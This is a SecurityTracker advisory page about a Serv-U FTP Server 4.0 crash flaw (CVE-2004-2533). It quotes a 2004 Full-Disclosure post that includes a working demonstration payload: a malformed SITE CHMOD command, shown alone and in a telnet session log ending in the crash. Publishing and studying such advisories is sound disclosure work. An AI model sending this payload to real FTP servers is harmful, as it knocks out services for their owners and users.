SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Your Ad Here
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (File Transfer/Sharing)  >  FTP Serv-U Vendors:  RhinoSoft.com
Serv-U FTP Server Can Be Crashed By Remote Authenticated Users With a Malformed SITE CHMOD Command
SecurityTracker Alert ID:  1009086
SecurityTracker URL:  http://securitytracker.com/id?1009086
CVE Reference:  CVE-2004-2533   (Links to External Site)
Updated:  Jun 24 2008
Original Entry Date:  Feb 17 2004
Impact:  Denial of service via network
Exploit Included:  Yes  
Version(s): 4.0
Description:  A vulnerability was reported in the Serv-U FTP Server. A remote authenticated user can cause the FTP service to crash.

It is reported that a remote authenticated user can issue a specially crafted SITE CHMOD command to cause the FTP service to terminate.

This new flaw is reportedly different than the SITE CHMOD flaw reported in January 2004 in Alert ID 1008841 because the new flaw does not require the remote authenticated user to have write access to any directories.

A demonstration exploit is provided:

SITE CHMOD 666 \\...\UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
Impact:  A remote authenticated user can cause the FTP service to crash.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.serv-u.com/ (Links to External Site)
Cause:  Boundary error
Underlying OS:  Windows (Any)
Reported By:  Some Guy <maillist@bastart.eu.org>
Message History:   None.

 Source Message Contents
Date:  Mon, 16 Feb 2004 22:36:14 +0100
From:  Some Guy <maillist@bastart.eu.org>
Subject:  [Full-Disclosure] Serv-U 4.1 Memory Corruption / Whatever

 

Well, I didn't have the time to fully analyze it yet, but by using a 
fuzzer to check
Serv-U, I found something that crashed it using bad data in SITE CHMOD. 
This is
not the already discovered vulnerability, cause it can be used without 
write access,
the crash occurs before permissions are even checked. Seems like an 
off-by-two,
cause you can control 2 bytes of a dword where your buffer gets written, 
but I wasn't
able to find how the other 2 bytes are controlled yet, and I wasn't able 
to do anything
useful with the 2 bytes I have cause they can't be NULL. Well, I hope 
someone can
enlighten me a little, cause I tried the last 2 days and now I'm out of 
ideas.

hello@proxy:~# telnet ftp.target.com 21
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
220 Serv-U FTP Server v4.0 for WinSock ready...
USER myuser
331 User name okay, need password.
PASS mypass
230 User logged in, proceed.
SITE CHMOD 666 \\...\UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
Connection closed by foreign host.
hello@proxy:~#

this will cause this an ccess violation writing to 0x555551AD (UUQ-)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2007, SecurityGlobal.net LLC